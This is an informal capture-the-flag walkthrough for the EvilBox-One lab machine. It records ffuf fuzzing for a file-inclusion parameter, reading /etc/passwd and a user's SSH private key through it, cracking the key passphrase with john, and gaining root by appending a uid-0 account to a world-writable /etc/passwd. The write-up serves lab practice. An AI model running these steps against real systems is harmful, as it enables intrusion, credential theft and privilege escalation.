Hostname: evilbox-one.
OS Type: Linux
IP Address: 192.168.210.212
Open Ports: 22/80
Usernames:
Spotted Vulns:
Flag Value: See below
Proof Value: See below
Interesting:
http://192.168.210.212/secret/ – Empty file. Interesting
Robots empty cept for ‘hello hax0r’ or whatever
http://192.168.210.212/secret/evil.php auch leer
/etc/passwd world-writeable.
Site says to try ffuf:
ffuf -w /usr/share/wordlists/dirb/big.txt -u http://192.168.210.212/secret/evil.php?FUZZ=/etc/passwd -fw 1
Holy shit, this works and shows /etc/passwd. See in this dir
http://target/secret/evil.php?command=/etc/passwd
root:x:0:0:root:/root:/bin/bash
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
Now, grab mowree’s id_rsa key:
http://target/secret/evil.php?command=//home/mowree/.ssh/id_rsa
Fk Can’t believe that worked.
See id_rsa-mowree
Now, ssh with it.
ssh -i ~/.ssh/id_rsa mowree@target
No worries, lets try to crack the passphrase using ssh2john:
john id_rsa-cracked –wordlist=/home/loki/passes/rockyou.txt
unicorn (id_rsa-mowree) BOOM!
Now, ssh -i id_rsa mowree@target with unicorn as pasword
unicorn worked but ssh barked at me because permissions on id_rsa were ‘too open’, Changed to 700 and it worked.
Local.txt = cb549baa854eae11cb0067989[Clipped] – You can find it!
ssh mowree@target + uniforn doesn’t work.
By default, the cracked passwords are stored in john.pot
ok, wow. /etc/passwd is world writeable. Found it with linpeas.sh (madlinux.com/linpeas.sh)
mowree@EvilBoxOne:~$ openssl passwd fake
ysff4LZ7cRuQU
mowree@EvilBoxOne:~$ echo “root2:ysff4LZ7cRuQU:0:0:root:/root:/bin/bash” >> /etc/passwd
mowree@EvilBoxOne:~$ su root2
That hashes above we created with openssl cracks with john to be the password ‘fake’
flag.txt = 24f148f3eadd12bf61691[Clipped] – Find it for yourself